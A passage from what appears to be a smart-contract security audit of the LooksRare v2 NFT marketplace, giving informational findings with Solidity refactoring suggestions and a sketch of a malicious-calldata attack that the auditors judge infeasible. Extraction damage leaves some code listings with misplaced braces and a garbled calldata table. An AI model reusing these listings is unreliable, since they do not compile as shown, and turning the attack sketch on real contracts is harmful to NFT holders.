    MerkleTree merkleTree;
}

and pass an input parameter of this type to executeMultipleTakerBids:

function executeMultipleTakerBids(
    BidOrder[] calldata bidOrders,
    address affiliate,
    bool isAtomic
) external payable nonReentrant {
    uint256 length = bidOrders.length;
    if (length == 0) {
        revert WrongLengths(); // <--- possibly this can be changed to WrongLength()
    }
    ...

Optionally, one can apply this parameter change to executeTakerAsk (we would need to define a new struct for this instance) and executeTakerBid as well.
Related issue: "Restructure transferBatchItemsAcrossCollections input parameter format".
LooksRare: Acknowledged but won't adjust.
Spearbit: Acknowledged.

+5.5.8 Restructure transferBatchItemsAcrossCollections input parameter format
Severity: Informational
Context:
• TransferManager.sol#L112-L119
• TransferManager.sol#L122-L130
• TransferManager.sol#L140-L142
Description: transferBatchItemsAcrossCollections has the following form:

function transferBatchItemsAcrossCollections(
    address[] calldata collections,
    uint256[] calldata assetTypes,
    address from,
    address to,
    uint256[][] calldata itemIds,
    uint256[][] calldata amounts
)

where collections, assetTypes, itemIds, and amounts are supposed to have the same lengths. One can enforce that by redefining the input parameter, so that this invariant holds by definition.
Recommendation: Define a new struct:

struct TransferItem {
    address collection;
    uint256 assetType;
    uint256[] itemIds;
    uint256[] amounts;
}

or, if implementing "Restructure struct definitions in OrderStructs in a more optimized format":

struct TransferItem {
    address collection;
    uint256 assetType;
    Item[] items;
}

so that transferBatchItemsAcrossCollections will have the following form:

function transferBatchItemsAcrossCollections(
    address from,
    address to,
    TransferItem[] calldata transferItems
) external {
    uint256 transferItemsLength = transferItems.length;
    if (transferItemsLength == 0) {
        revert WrongLengths(); // <--- possibly this can be changed to WrongLength()
    }
    if (from != msg.sender) {
        if (!isOperatorValidForTransfer(from, msg.sender)) {
            revert TransferCallerInvalid();
        }
    }
    for (uint256 i; i < transferItemsLength; ) {
        uint256 itemsForSingleTransfer = transferItems[i].items.length;
        if (itemsForSingleTransfer == 0) { // <--- if issues/56 implemented
            revert WrongLengths(); // <--- possibly this can be changed to WrongLength()
        }
        ...

An added benefit is that the calldata is more compactly packed as well. Optionally, one could redefine transferItemsERC721 and transferItemsERC1155 using the above new struct.
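For illustration, a caller-side sketch of the restructured endpoint (a sketch only; erc721Collection, erc1155Collection, transferManager, from and to are assumed to be in scope, and TransferItem is the first variant above):

// Build one TransferItem per (collection, assetType) pair and batch them.
TransferItem[] memory transferItems = new TransferItem[](2);

uint256[] memory erc721Ids = new uint256[](1);
erc721Ids[0] = 42;
uint256[] memory erc721Amounts = new uint256[](1);
erc721Amounts[0] = 1; // ERC721 transfers always move exactly 1

transferItems[0] = TransferItem({
    collection: erc721Collection,
    assetType: 0,
    itemIds: erc721Ids,
    amounts: erc721Amounts
});

uint256[] memory erc1155Ids = new uint256[](1);
erc1155Ids[0] = 7;
uint256[] memory erc1155Amounts = new uint256[](1);
erc1155Amounts[0] = 5;

transferItems[1] = TransferItem({
    collection: erc1155Collection,
    assetType: 1,
    itemIds: erc1155Ids,
    amounts: erc1155Amounts
});

transferManager.transferBatchItemsAcrossCollections(from, to, transferItems);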
Related issue: "Restructure executeMultipleTakerBids's input parameters". Warning The issue below needs to be re-examined due to the change of input parameters structures: • "An approved operator can call transferBatchItemsAcrossCollections". LooksRare: Fixed in PR 375. Only transferBatchItemsAcrossCollections has been modified to use the new struct. Spearbit: Verified. +5.5.9 An approved operator can call transferBatchItemsAcrossCollections Severity: Informational Context: • TransferManager.sol#L112 Description: TransferManager has 3 endpoints that an approved operator can call: • transferItemsERC721 • transferItemsERC1155 • transferBatchItemsAcrossCollections The first 2 share the same input parameter types but differ from transferBatchItemsAcrossCollections: , address transferItemsERC1155 address ,! address[], address[], address, address , uint256[][], uint256[][] // ,! transferBatchItemsAcrossCollections , address, uint256[], uint256[] // transferItemsERC721, 44 An operator like LooksRareProtocol might have an owner ( OL ) that can select/add arbitrary endpoint of this transfer manager for an asset type, but only call the transfer manager using the same input parameter types regardless of the added endpoint. So in this case, OL might add a new asset type with TransferManager.transferBatchItemsAcrossCollections.selector as the selector and this transfer manager as the manager. Now, since this operator/LooksRareProtocol (and possibly other future implementations of approved operators) uses the same list of parameters for all endpoints, when _transferNFT gets called, the transfer manager using the transferBatchItemsAcrossCollections endpoint but with the following encoded data: the protocol would call abi.encodeWithSelector( managerSelectorOfAssetType[assetType].selector, collection, sender, recipient, itemIds, amounts ) ) A crafty OL might try to take advantage of the parameter type mismatch to create a malicious payload (address, address, address, uint256[], uint256[] ) that when decoded as (address[], address[], address, address, uint256[][], uint256[][]) It would allow them to transfer any NFT tokens from any user to some specific users. ; interpreted paramters | original parameter ,! ; ---------------------------------- ,! -------- c Ma.s or msg.sender 00000000000000000000000000000000000000000000000000000000000000c0 ; collections.ptr 0000000000000000000000000000000000000000000000000000000000000100 ; assetTypes.ptr ,! 00000000000000000000000000000000000000000000000000000000000000X3 ; from ,! 00000000000000000000000000000000000000000000000000000000000000X4 ; to ,! itemIds.ptr -> 0xa0 Tb.r or Mb.s x 0000000000000000000000000000000000000000000000000000000000000140 ; itemIds.ptr ,! amounts.ptr -> 0xc0 + 0x20 * itemIds.length 00000000000000000000000000000000000000000000000000000000000001c0 ; amounts.ptr ,! itemIds.length | collection | from / | to / | | | ; ; | itemIds[0] | itemIds[1] ... Fortunately, that is not possible since in this particular instance the transferItemsERC721 and transferItem- sERC1155's amounts's calldata tail pointer always coincide with transferBatchItemsAcrossCollections's itemIds's calldata tail pointer (uint256[] amounts, uint256[][] itemIds) which unless both have length 0 it would cause the compiled code to revert due to out of range index access. This is also dependent on if/how the compiler encodes/decodes the calldata and if the compiler would add the bytecodes for the deployed code to revert for OOR accesses (which solc does). 
Recommendation:
1. transferBatchItemsAcrossCollections has not been used by the LooksRareProtocol as an operator for any asset type, and its presence is only utilitarian. It is recommended to remove it from TransferManager. If transferBatchItemsAcrossCollections is needed, it can be defined in another transfer manager contract.
2. With the current implementation of _transferNFT, which assumes all endpoints of a transfer manager consume the same combination of input parameters, the endpoints that an operator can call should, in all defined transfer managers, consume the same input parameter types.
3. To add even more protection, each transfer manager should only handle 1 asset type and only through 1 endpoint that an operator can call. Alternatively, users of transfer managers should be able to handpick which endpoints an operator is approved to call for that transfer manager (vs. the current implementation, where the user approval for an operator is at the contract level). This would introduce a more granular approval process for the operators.

// below is just an example; another solution is to index the endpoints and
// bitmap up to 256 selector permissions into one storage slot
mapping(address => mapping(address => mapping(bytes4 => bool))) public hasUserApprovedOperatorForASelector;

LooksRare: Acknowledged. This function may be used in future versions of protocols that would sell bundles across multiple collections. With the change, it is not possible with v2 to add new asset types, so it should be partially mitigated.
Spearbit: Acknowledged.

+5.5.10 Shared logic in different StrategyFloorFromChainlink strategies can be refactored
Severity: Informational
Context:
• StrategyFloorFromChainlink.sol#L54
• StrategyFloorFromChainlink.sol#L108
• StrategyFloorFromChainlink.sol#L162
• StrategyFloorFromChainlink.sol#L219
Description:
• executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid.
• executeFixedDiscountCollectionOfferStrategyWithTakerAsk and executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk.
Each group of endpoints in the above list shares exactly the same logic. The only difference is the formula and checks used to calculate the desiredPrice based on a given floorPrice and premium/discount. Schematically:

function a1(<params>) external view returns (<R>) {
    (<R>) = _a1(<args>); // inlined computation of _a1
}

function a2(<params>) external view returns (<R>) {
    (<R>) = _a2(<args>); // inlined computation of _a2
}

Recommendation: Using function pointers, we can refactor the common logic between the endpoints in this context:

function a1(<params>) external view returns (<R>) {
    return _a(<args>, _a1);
}

function a2(<params>) external view returns (<R>) {
    return _a(<args>, _a2);
}

function _a1(<params>) internal view returns (<R>) { // can also be `pure` depending on the context
    ...
}

function _a2(<params>) internal view returns (<R>) { // can also be `pure` depending on the context
    ...
}

function _a(
    <params>,
    function (<params>) internal view returns (<R>) f
) internal view returns (<R>) {
    (<R>) = f(<args>); // <-- internal function pointer
}

The above design has the added benefit that if one would like to update either the shared logic (_a) or one of the price formulas (_a1/_a2), the change only needs to be applied in one location instead of two. With the current implementation, if one forgets to apply the change to both locations, the related strategies would deviate from each other.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Chainlink aggregator interface
import {AggregatorV3Interface} from
"@chainlink/contracts/src/v0.8/interfaces/AggregatorV3Interface.sol"; // Libraries import {OrderStructs} from "../../libraries/OrderStructs.sol"; // Shared errors import {AskTooHigh, BidTooLow, OrderInvalid, WrongCurrency, WrongFunctionSelector} from ,! "../../interfaces/SharedErrors.sol"; // Base strategy contracts import {BaseStrategy} from "../BaseStrategy.sol"; import {BaseStrategyChainlinkMultiplePriceFeeds} from "./BaseStrategyChainlinkMultiplePriceFeeds.sol"; /** * @title StrategyFloorFromChainlink * @notice This contract allows a seller to make a floor price + premium ask * * @author LooksRare protocol team (,) */ and a buyer to make a floor price - discount collection bid. contract StrategyFloorFromChainlink is BaseStrategy, BaseStrategyChainlinkMultiplePriceFeeds { /** * @notice It is returned if the fixed discount for a maker bid is greater than floor price. */ 47 error DiscountGreaterThanFloorPrice(); /** * @notice Wrapped ether (WETH) address. */ address public immutable WETH; /** * @notice Constructor * @param _owner Owner address * @param _weth Address of WETH */ constructor(address _owner, address _weth) BaseStrategyChainlinkMultiplePriceFeeds(_owner) { WETH = _weth; } /** * @notice This function validates the order under the context of the chosen strategy and return ,! the fulfillable items/amounts/price/nonce invalidation status * This strategy looks at the seller's desired execution price in ETH (floor + premium) and ,! minimum execution price and chooses the higher price. * @param takerBid Taker bid struct (contains the taker bid-specific parameters for the execution ,! of the transaction) * @param makerAsk Maker ask struct (contains the maker ask-specific parameters for the execution ,! of the transaction) * @return price The final execution price * @return itemIds The final item ids to be traded * @return amounts The corresponding amounts for each item id. It should always be 1 for any asset ,! type. * @return isNonceInvalidated Whether the order's nonce will be invalidated after executing the ,! order * @dev The client has to provide the bidder's desired premium amount in ETH from the floor price ,! as the additionalParameters. */ function executeFixedPremiumStrategyWithTakerBid( OrderStructs.TakerBid calldata takerBid, OrderStructs.MakerAsk calldata makerAsk ) external view returns (uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool ,! isNonceInvalidated) { return _executePremiumStrategyWithTakerBid( takerBid, makerAsk, _fixedPremiumPriceCalculator ); } function _fixedPremiumPriceCalculator( uint256 floorPrice, uint256 premium ) internal pure returns (uint256 desiredPrice) { desiredPrice = floorPrice + premium; } /** * @notice This function validates the order under the context of the chosen strategy and return ,! the fulfillable items/amounts/price/nonce invalidation status. * This strategy looks at the seller's desired execution price in ETH (floor * (1 + ,! premium)) and minimum execution price and chooses the higher price. 48 * @param takerBid Taker bid struct (contains the taker bid-specific parameters for the execution ,! of the transaction) * @param makerAsk Maker ask struct (contains the maker ask-specific parameters for the execution ,! of the transaction) * @return price The final execution price * @return itemIds The final item ids to be traded * @return amounts The corresponding amounts for each item id. It should always be 1 for any asset ,! type. 
* @return isNonceInvalidated Whether the order's nonce will be invalidated after executing the ,! order * @dev The client has to provide the bidder's desired premium basis points from the floor price as ,! the additionalParameters. */ function executeBasisPointsPremiumStrategyWithTakerBid( OrderStructs.TakerBid calldata takerBid, OrderStructs.MakerAsk calldata makerAsk ) external view returns (uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool ,! isNonceInvalidated) { return _executePremiumStrategyWithTakerBid( takerBid, makerAsk, _basisPointsPremiumPriceCalculator ); } function _basisPointsPremiumPriceCalculator( uint256 floorPrice, uint256 premium ) internal pure returns (uint256 desiredPrice) { desiredPrice = (floorPrice * (10_000 + premium)) / 10_000; } function _executePremiumStrategyWithTakerBid( OrderStructs.TakerBid calldata takerBid, OrderStructs.MakerAsk calldata makerAsk, function ( uint256 /* floorPrice */ , uint256 /* premium */ ) internal pure returns (uint256 /* desiredPrice */ ) _desiredPriceCalculator ) internal view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) { if (makerAsk.currency != address(0)) { if (makerAsk.currency != WETH) { revert WrongCurrency(); } } if ( makerAsk.itemIds.length != 1 || makerAsk.amounts.length != 1 || makerAsk.amounts[0] != 1 || makerAsk.itemIds[0] != takerBid.itemIds[0] || takerBid.amounts[0] != 1 ) { 49 revert OrderInvalid(); } uint256 floorPrice = _getFloorPrice(makerAsk.collection); uint256 premium = abi.decode(makerAsk.additionalParameters, (uint256)); uint256 desiredPrice = _desiredPriceCalculator(floorPrice, premium); // <--- passed function ,! pointer if (desiredPrice >= makerAsk.minPrice) { price = desiredPrice; } else { price = makerAsk.minPrice; } if (takerBid.maxPrice < price) { revert BidTooLow(); } itemIds = makerAsk.itemIds; amounts = makerAsk.amounts; isNonceInvalidated = true; } /** * @notice This function validates the order under the context of the chosen strategy and return ,! the fulfillable items/amounts/price/nonce invalidation status. * This strategy looks at the bidder's desired execution price in ETH (floor - discount) ,! and maximum execution price and chooses the lower price. * @param takerAsk Taker ask struct (contains the taker ask-specific parameters for the execution ,! of the transaction) * @param makerBid Maker bid struct (contains the maker bid-specific parameters for the execution ,! of the transaction) * @return price The final execution price * @return itemIds The final item ids to be traded * @return amounts The corresponding amounts for each item id. It should always be 1 for any asset ,! type. * @return isNonceInvalidated Whether the order's nonce will be invalidated after executing the ,! order * @dev The client has to provide the bidder's desired discount amount in ETH from the floor price ,! as the additionalParameters. */ function executeFixedDiscountCollectionOfferStrategyWithTakerAsk( OrderStructs.TakerAsk calldata takerAsk, OrderStructs.MakerBid calldata makerBid ) external view returns (uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool ,! 
isNonceInvalidated) { return _executeDiscountCollectionOfferStrategyWithTakerAsk( takerAsk, makerBid, _calculateFixedDiscountedPrice ); } function _calculateFixedDiscountedPrice( uint256 floorPrice, uint256 discount ) internal pure returns (uint256 desiredPrice) { if (floorPrice <= discount) { 50 revert DiscountGreaterThanFloorPrice(); } desiredPrice = floorPrice - discount; } /** * @notice This function validates the order under the context of the chosen strategy and return ,! the fulfillable items/amounts/price/nonce invalidation status. * This strategy looks at the bidder's desired execution price in ETH (floor * (1 - ,! discount)) and maximum execution price and chooses the lower price. * @param takerAsk Taker ask struct (contains the taker ask-specific parameters for the execution ,! of the transaction) * @param makerBid Maker bid struct (contains the maker bid-specific parameters for the execution ,! of the transaction) * @return price The final execution price * @return itemIds The final item ids to be traded * @return amounts The corresponding amounts for each item id. It should always be 1 for any asset ,! type. * @return isNonceInvalidated Whether the order's nonce will be invalidated after executing the ,! order * @dev The client has to provide the bidder's desired discount basis points from the floor price ,! as the additionalParameters. */ function executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk( OrderStructs.TakerAsk calldata takerAsk, OrderStructs.MakerBid calldata makerBid ) external view returns (uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool ,! isNonceInvalidated) { return _executeDiscountCollectionOfferStrategyWithTakerAsk( takerAsk, makerBid, _calculateBasisPointsDiscountedPrice ); } function _calculateBasisPointsDiscountedPrice( uint256 floorPrice, uint256 discount ) internal pure returns (uint256 desiredPrice) { // @dev Discount cannot be 100% if (discount >= 10_000) { revert OrderInvalid(); } desiredPrice = (floorPrice * (10_000 - discount)) / 10_000; } function _executeDiscountCollectionOfferStrategyWithTakerAsk( OrderStructs.TakerAsk calldata takerAsk, OrderStructs.MakerBid calldata makerBid, function ( uint256 /* floorPrice */ , uint256 /* discount */ ) internal pure returns (uint256 /* desiredPrice */ ) _desiredPriceCalculator ) internal view 51 returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) { if (makerBid.currency != WETH) { revert WrongCurrency(); } if ( takerAsk.itemIds.length != 1 || takerAsk.amounts.length != 1 || takerAsk.amounts[0] != 1 || makerBid.amounts.length != 1 || makerBid.amounts[0] != 1 revert OrderInvalid(); ) { } uint256 floorPrice = _getFloorPrice(makerBid.collection); uint256 discount = abi.decode(makerBid.additionalParameters, (uint256)); uint256 desiredPrice = _desiredPriceCalculator(floorPrice, discount); // <--- passed function ,! pointer if (desiredPrice >= makerBid.maxPrice) { price = makerBid.maxPrice; } else { price = desiredPrice; } if (takerAsk.minPrice > price) { revert AskTooHigh(); } itemIds = takerAsk.itemIds; amounts = takerAsk.amounts; isNonceInvalidated = true; } /** * @notice This function validates *only the maker* order under the context of the chosen strategy. ,! It does not revert if * the maker order is invalid. Instead it returns false and the error's 4 bytes selector. * @param makerAsk Maker ask struct (contains the maker ask-specific parameters for the execution ,! 
of the transaction) * @param functionSelector Function selector for the strategy * @return isValid Whether the maker struct is valid * @return errorSelector If isValid is false, it returns the error's 4 bytes selector */ function isMakerAskValid( OrderStructs.MakerAsk calldata makerAsk, bytes4 functionSelector ) external view returns (bool isValid, bytes4 errorSelector) { if ( functionSelector != ,! StrategyFloorFromChainlink.executeBasisPointsPremiumStrategyWithTakerBid.selector && functionSelector != ,! StrategyFloorFromChainlink.executeFixedPremiumStrategyWithTakerBid.selector ) { return (isValid, WrongFunctionSelector.selector); 52 } if (makerAsk.currency != address(0)) { if (makerAsk.currency != WETH) { return (isValid, WrongCurrency.selector); } } if (makerAsk.itemIds.length != 1 || makerAsk.amounts.length != 1 || makerAsk.amounts[0] != 1) { return (isValid, OrderInvalid.selector); } (, bytes4 priceFeedErrorSelector) = _getFloorPriceNoRevert(makerAsk.collection); if (priceFeedErrorSelector == bytes4(0)) { isValid = true; } else { errorSelector = priceFeedErrorSelector; } } /** * @notice This function validates *only the maker* order under the context of the chosen strategy. ,! It does not revert if * the maker order is invalid. Instead it returns false and the error's 4 bytes selector. * @param makerBid Maker bid struct (contains the maker bid-specific parameters for the execution ,! of the transaction) * @param functionSelector Function selector for the strategy * @return isValid Whether the maker struct is valid * @return errorSelector If isValid is false, it returns the error's 4 bytes selector * @dev The client has to provide the bidder's desired discount amount in ETH from the floor price ,! as the additionalParameters. */ function isMakerBidValid( OrderStructs.MakerBid calldata makerBid, bytes4 functionSelector ) external view returns (bool isValid, bytes4 errorSelector) { if ( functionSelector != ,! StrategyFloorFromChainlink.executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk.selector && functionSelector != StrategyFloorFromChainlink.executeFixedDiscountCollectionOfferStrategyWithTakerAsk.selector ) { } return (isValid, WrongFunctionSelector.selector); if (makerBid.currency != WETH) { return (isValid, WrongCurrency.selector); } if (makerBid.amounts.length != 1 || makerBid.amounts[0] != 1) { return (isValid, OrderInvalid.selector); } (uint256 floorPrice, bytes4 priceFeedErrorSelector) = ,! _getFloorPriceNoRevert(makerBid.collection); uint256 discount = abi.decode(makerBid.additionalParameters, (uint256)); if ( functionSelector == 53 ,! StrategyFloorFromChainlink.executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk.selector ) { if (discount >= 10_000) { return (isValid, OrderInvalid.selector); } } if (priceFeedErrorSelector != bytes4(0)) { return (isValid, priceFeedErrorSelector); } if ( functionSelector == StrategyFloorFromChainlink.executeFixedDiscountCollectionOfferStrategyWithTakerAsk.selector ) { if (floorPrice <= discount) { // A special selector is returned to differentiate with OrderInvalid since the maker ,! 
can potentially become valid again return (isValid, DiscountGreaterThanFloorPrice.selector); } } isValid = true; } function _getFloorPrice(address collection) private view returns (uint256 price) { address priceFeed = priceFeeds[collection]; if (priceFeed == address(0)) { revert PriceFeedNotAvailable(); } (, int256 answer, , uint256 updatedAt, ) = AggregatorV3Interface(priceFeed).latestRoundData(); // Verify the answer is not null or negative if (answer <= 0) { revert InvalidChainlinkPrice(); } // Verify the latency if (block.timestamp > maxLatency + updatedAt) { revert PriceNotRecentEnough(); } price = uint256(answer); } function _getFloorPriceNoRevert( address collection ) private view returns (uint256 floorPrice, bytes4 errorSelector) { address priceFeed = priceFeeds[collection]; if (priceFeed == address(0)) { return (floorPrice, PriceFeedNotAvailable.selector); } (, int256 answer, , uint256 updatedAt, ) = AggregatorV3Interface(priceFeed).latestRoundData(); if (answer <= 0) { return (floorPrice, InvalidChainlinkPrice.selector); } if (block.timestamp > maxLatency + updatedAt) { return (floorPrice, PriceNotRecentEnough.selector); 54 } return (uint256(answer), bytes4(0)); } } LooksRare: Fixed in PR 345. Spearbit: Verified. +5.5.11 Setting protocol and ask fee amounts and recipients can be refactored in ExecutionManager Severity: Informational Context: • ExecutionManager.sol#L154-L170 • ExecutionManager.sol#L240-L256 Description: Setting and calculating the protocol and ask fee amounts and recipients follow the same logic in _executeStrategyForTakerAsk and _executeStrategyForTakerBid. Recommendation: Refactor the shared logic. Define: function _setTheRestOfFeeAmountsAndRecipients( uint256 strategyId, uint256 price, address askRecipient, address[3] memory recipients, uint256[3] memory fees ) private view { // Compute minimum total fee amount uint256 minTotalFeeAmount = (price * strategyInfo[strategyId].minTotalFeeBp) / 10_000; if (fees[1] == 0) { // If creator fee is null, protocol fee is set as the minimum total fee amount fees[0] = minTotalFeeAmount; // Net fee amount for seller fees[2] = price - fees[0]; } else { // If there is a creator fee information, the protocol fee amount can be calculated fees[0] = _calculateProtocolFeeAmount(price, strategyId, fees[1], minTotalFeeAmount); // Net fee amount for seller fees[2] = price - fees[1] - fees[0]; } recipients[0] = protocolFeeRecipient; recipients[2] = askRecipient; } and replace ExecutionManager.sol#L154-L170 with: _setTheRestOfFeeAmountsAndRecipients( makerBid.strategyId, price, takerAsk.recipient == address(0) ? sender : takerAsk.recipient, recipients, fees ); and ExecutionManager.sol#L240-L256 with: 55 _setTheRestOfFeeAmountsAndRecipients( makerAsk.strategyId, price, makerAsk.signer, recipients, fees ); LooksRare: Implemented in PR 339. Spearbit: Verified. +5.5.12 Creator fee amount and recipient calculation can be refactored in ExecutionManager Severity: Informational Context: • ExecutionManager.sol#L141-L152 • ExecutionManager.sol#L227-L238 Description: The create fee amount and recipient calculation in _executeStrategyForTakerAsk and _executeS- trategyForTakerBid are identical and can be refactored. 
Recommendation: Define function _calculateCreatorFeeAmountAndRecipient( address collection, uint256 price, uint256[] memory itemIds ) private view returns (address recipient, uint256 fee) { // Creator fee amount and adjustment of protocol fee amount if (address(creatorFeeManager) != address(0)) { (recipient, fee) = creatorFeeManager.viewCreatorFeeInfo(collection, price, itemIds); if (recipient == address(0)) { // If recipient is null address, creator fee is set at 0 fee = 0; } else if (fee * 10_000 > (price * uint256(maxCreatorFeeBp))) { // If creator fee is higher than tolerated, it reverts revert CreatorFeeBpTooHigh(); } } } and replace ExecutionManager.sol#L227-L238 with: (recipients[1], fees[1]) = _calculateCreatorFeeAmountAndRecipient( makerAsk.collection, price, itemIds ); and ExecutionManager.sol#L141-L152 with: (recipients[1], fees[1]) = _calculateCreatorFeeAmountAndRecipient( makerBid.collection, price, itemIds ); 56 LooksRare: Implemented in PR 336. Spearbit: Verified. +5.5.13 The owner can set the selector for a strategy to any bytes4 value Severity: Informational Context: • StrategyManager.sol#L80 • IStrategyManager.sol#L24 • ExecutionManager.sol#L124-L126 • ExecutionManager.sol#L210-L212 Description: The owner can set the selector for a strategy to any bytes4 value (as long as it's not bytes4(0)). Even though the following check exists if (!IBaseStrategy(implementation).isLooksRareV2Strategy()) { revert NotV2Strategy(); } There is no measure taken to avoid potential selector collision with other contract types. Recommendation: To avoid future potential pitfalls that could take advantage of the freedom to choose any selector value, it would be best to give strategies a more firm structure and pick a fixed selector when one would want to call them. That means removing the selector field: struct Strategy { bool isActive; uint16 standardProtocolFeeBp; uint16 minTotalFeeBp; uint16 maxProtocolFeeBp; bytes4 selector; bool isMakerBid; address implementation; IBaseStrategy implementation; - - + } Modifiy IBaseStrategy: interface IBaseStrategy { ... function executeStrategyForTakerAsk(TakerAsk takerAsk, MakerBid makerBid) external returns ( uint256 price, uint256[] itemIds, uint256[] amounts, bool isNonceInvalidated ); function executeStrategyForTakerBid(TakerBid takerBid, MakerAsk makerAsk) external returns ( uint256 price, uint256[] itemIds, uint256[] amounts, bool isNonceInvalidated ); } // or even define an abstract contract: abstract contract BaseStrategy ... { 57 ... function executeStrategyForTakerAsk(TakerAsk takerAsk, MakerBid makerBid) external virtual returns ( uint256 price, uint256[] itemIds, uint256[] amounts, bool isNonceInvalidated ) { revert(); } function executeStrategyForTakerBid(TakerBid takerBid, MakerAsk makerAsk) external virtual returns ( uint256 price, uint256[] itemIds, uint256[] amounts, bool isNonceInvalidated ) { revert(); } function isMakerBidValid( MakerBid calldata makerBid ) external view virtual returns (bool isValid) { revert(); } function isMakerAskValid( MakerAsk calldata makerAsk ) external view virtual returns (bool isValid) { revert(); } } The endpoint names can be any other name as long as one would avoid selector collision with all the other contracts involved in the protocol (LooksRareProtocol, TransferManager, wETH, IERC20, IERC721, IERC1155, IERC1271, ...). An implementation of IBaseStrategy can implement both or only one of the above endpoints (the unimplemented one can revert). 
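As an illustration, a minimal strategy built on the abstract contract sketched above (hypothetical; the MakerAsk field names follow those used elsewhere in this report, and the unimplemented taker-ask endpoint keeps its default revert):

contract FixedPriceStrategy is BaseStrategy {
    // Implements only the taker-bid side; executeStrategyForTakerAsk is
    // inherited and reverts by default.
    function executeStrategyForTakerBid(
        TakerBid calldata /* takerBid */,
        MakerAsk calldata makerAsk
    ) external pure override returns (
        uint256 price,
        uint256[] memory itemIds,
        uint256[] memory amounts,
        bool isNonceInvalidated
    ) {
        // Fill at exactly the maker's signed price and items.
        price = makerAsk.minPrice;
        itemIds = makerAsk.itemIds;
        amounts = makerAsk.amounts;
        isNonceInvalidated = true;
    }
}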
Then, in ExecutionManager, the strategy call sites can be modified. Transform:

(bool status, bytes memory data) = strategyInfo[makerBid.strategyId].implementation.call(
    abi.encodeWithSelector(strategyInfo[makerBid.strategyId].selector, takerAsk, makerBid)
);
if (!status) {
    // @dev It forwards the revert message from the low-level call
    assembly {
        revert(add(data, 32), mload(data))
    }
}
(price, itemIds, amounts, isNonceInvalidated) = abi.decode(data, (uint256, uint256[], uint256[], bool));

into:

IBaseStrategy strategy = strategyInfo[makerBid.strategyId].implementation;
(price, itemIds, amounts, isNonceInvalidated) = strategy.executeStrategyForTakerAsk(takerAsk, makerBid);

and transform:

(bool status, bytes memory data) = strategyInfo[makerAsk.strategyId].implementation.call(
    abi.encodeWithSelector(strategyInfo[makerAsk.strategyId].selector, takerBid, makerAsk)
);
if (!status) {
    // @dev It forwards the revert message from the low-level call
    assembly {
        revert(add(data, 32), mload(data))
    }
}
(price, itemIds, amounts, isNonceInvalidated) = abi.decode(data, (uint256, uint256[], uint256[], bool));

into:

IBaseStrategy strategy = strategyInfo[makerAsk.strategyId].implementation;
(price, itemIds, amounts, isNonceInvalidated) = strategy.executeStrategyForTakerBid(takerBid, makerAsk);

The above also has the added benefit that less storage space would be needed, since selector is removed. Note that certain strategies might need to be split into two separate strategies (StrategyCollectionOffer, StrategyFloorFromChainlink). Or, one can combine two strategy endpoints into one by conditioning on the additionalParameters fields. isLooksRareV2Strategy for IBaseStrategy can also be replaced by allowing IBaseStrategy to extend IERC165.
Related issue: "The Protocol owner can drain users' currency tokens".
LooksRare: Acknowledged but will not adjust. For strategies such as Chainlink, it greatly simplifies things if multiple makerBid/makerAsk strategies exist in the same file.
Spearbit: Acknowledged.

+5.5.14 Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies
Severity: Informational
Context:
• InheritedStrategy.sol#L59
• StrategyItemIdsRange.sol#L25
• StrategyDutchAuction.sol#L26
• StrategyCollectionOffer.sol
• StrategyFloorFromChainlink.sol
• StrategyUSDDynamicAsk.sol
Description: Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies.

notation | description
Ti       | length of the taker's bid (or ask, depending on the context) item ids
Ta       | length of the taker's bid (or ask, depending on the context) amounts
Mi       | length of the maker's bid (or ask, depending on the context) item ids
Ma       | length of the maker's bid (or ask, depending on the context) amounts

• InheritedStrategy: Ti = Ta = Mi = Ma
• StrategyItemIdsRange: Ti <= Ta, Mi = 2, Ma = 1 (related issue)
• StrategyDutchAuction: Mi <= Ti, Ma <= Ta, Mi = Ma
• StrategyUSDDynamicAsk: Mi <= Ti, Ma <= Ta, Mi = Ma
• StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid: Mi <= Ti, Ma <= Ta, Mi = Ma = 1
• StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk: Ti = 1, Ta = 1, Ma = 1
• StrategyCollectionOffer: Ti = 1, 1 <= Ta, Ma = 1

The equalities above are explicitly enforced, but the inequalities are implicitly enforced through the compiler's out-of-bound revert. Note that in most cases (except StrategyItemIdsRange) one can enforce Ti = Ta = Mi = Ma and refactor this logic into a utility function.
Recommendation: Document why the different length comparisons are not enforced, or explicitly enforce the equalities. One possible reason the equality checks have been skipped could be gas savings, leaving it up to the taker to provide the most compact calldata.
LooksRare: The TakerXxx structs have been merged into a single Taker struct that does not include itemIds or amounts, so this issue is not relevant anymore; see PR 383.
Spearbit: Verified.

+5.5.15 Requirements/checks for adding new transfer managers (or strategies) are really important to avoid self-reentrancy through restrictedExecuteTakerBid from unexpected call sites
Severity: Informational
Context:
• TransferSelectorNFT.sol#L48
• LooksRareProtocol.sol#L243
• StrategyManager.sol#L71-L73
Description: When a new transfer manager gets added to the protocol, there is a check to make sure that this manager cannot be the protocol itself. This is really important, as restrictedExecuteTakerBid allows the protocol itself to call this endpoint. If the check below were omitted:
